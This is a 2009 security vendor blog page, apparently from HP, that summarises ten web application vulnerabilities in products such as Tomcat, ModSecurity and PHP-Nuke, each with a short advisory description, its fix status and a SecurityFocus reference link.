HP Security Products Blog
From applications to infrastructure, enterprises and governments alike face a constant barrage of digital attacks designed to steal data, cripple networks, damage brands, and perform a host of other malicious intents. HP Enterprise Security Products offers products and services that help organizations meet the security demands of a rapidly changing and more dangerous world. HP ESP enables businesses and institutions to take a proactive approach to security that integrates information correlation, deep application analysis and network-level defense mechanisms—unifying the components of a complete security program and reducing risk across your enterprise. In this blog, we will announce the latest offerings from HP ESP, discuss current trends in vulnerability research and technology, reveal new HP ESP security initiatives and promote our upcoming appearances and speaking engagements.

Top Five Web Application Vulnerabilities 6/08/09 - 6/23/09

1) F5 Networks FirePass SSL VPN Unspecified Cross-Site Scripting Vulnerability


F5 Networks FirePass SSL VPN is susceptible to a Cross-Site Scripting vulnerability.  If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. An update which resolves this issue has been released. Contact the vendor for more details.


http://www.securityfocus.com/bid/35312


2) ModSecurity SQL Injection Rule Security Bypass Vulnerability


ModSecurity is susceptible to a SQL Injection rule security bypass vulnerability due to improper validation of user-supplied input.  An attacker can leverage this to bypass security restrictions and perform a number of web-application attacks.  A fix has not yet been released. Contact the vendor for additional information.


http://www.securityfocus.com/bid/35323


3) Apache Tomcat 'RequestDispatcher' Information Disclosure Vulnerability


Apache Tomcat is susceptible to an information disclosure vulnerability. Successful exploitation would give an attacker access to sensitive information which could likely be used to conduct more damaging attacks. Updates which resolve this issue have been released. Contact the vendor for further information.


http://www.securityfocus.com/bid/35263


4) FireStats 'firestats-wordpress.php' Remote File Include Vulnerability


FireStats is susceptible to a remote file include vulnerability due to improper validation of user-supplied input. Successful exploitation could lead to a complete compromise of the application and underlying system.  The latest version (1.6.2) resolves this issue. Contact the vendor for more information.


http://www.securityfocus.com/bid/35367


5) Kerio MailServer WebMail Cross Site Scripting Vulnerability


Kerio MailServer WebMail is susceptible to a Cross-Site Scripting vulnerability. Cross-Site Scripting occurs when dynamically generated web pages display user input, such as login information, that is not properly validated, allowing an attacker to embed malicious scripts into the generated page and then execute the script on the machine of any user that views the site.  Updates which resolve this issue have been released. Contact the vendor for further details.


http://www.securityfocus.com/bid/35264


 


 


 

Top Five Web Application Vulnerabilities 5/26/09 - 6/07/09

1) Sun Java System Web Server Reverse Proxy Plug-in Cross-Site Scripting Vulnerability


Sun Java System Web Server is susceptible to a Cross-Site Scripting vulnerability. If successful, Cross-Site Scripting can be exploited to manipulate or steal cookies, create requests that can be mistaken for those of a valid user, compromise confidential information, or execute malicious code on end user systems. Updates which resolve this vulnerability have been released. Contact the vendor for further details.


http://www.securityfocus.com/bid/35204


2) PHP-Nuke 'main/tracking/userLog.php' SQL Injection Vulnerability


PHP-Nuke is susceptible to a SQL Injection vulnerability. Successful exploitation could give an attacker the means to access or modify backend database contents, or in some circumstances be utilized to take control of the server hosting the database. A solution has not yet been released. Contact the vendor for additional information.


http://www.securityfocus.com/bid/35117


3) phpBugTracker Multiple SQL Injection Vulnerabilities


phpBugTracker is susceptible to multiple SQL Injection vulnerabilities.  SQL Injection can allow an attacker full access to a backend database, and in certain circumstances can be utilized to take complete control of a system. Solutions have not yet been released. Contact the vendor for more information.


http://www.securityfocus.com/bid/35101
http://www.securityfocus.com/bid/35125


4) Apache Tomcat Form Authentication Existing/Non-Existing Username Enumeration Weakness


Apache Tomcat is susceptible to a username-enumeration weakness because different login results can be exploited to determine whether usernames are valid. Updates which resolve this issue are available. Contact the vendor for additional details.


http://www.securityfocus.com/bid/35196


5) IBM FileNet Content Manager Cached Subject Security Bypass Vulnerability


IBM FileNet Content Manager is susceptible to a security bypass vulnerability that may allow access to sensitive information. Fixes which address this issue have been released. Contact the vendor for further information. 


http://www.securityfocus.com/bid/35228

Search
Showing results for 
Search instead for 
Do you mean 
About the Author(s)
Follow Us


HP Blog

HP Software Solutions Blog

Labels
The opinions expressed above are the personal opinions of the authors, not of HP. By using this site, you accept the Terms of Use and Rules of Participation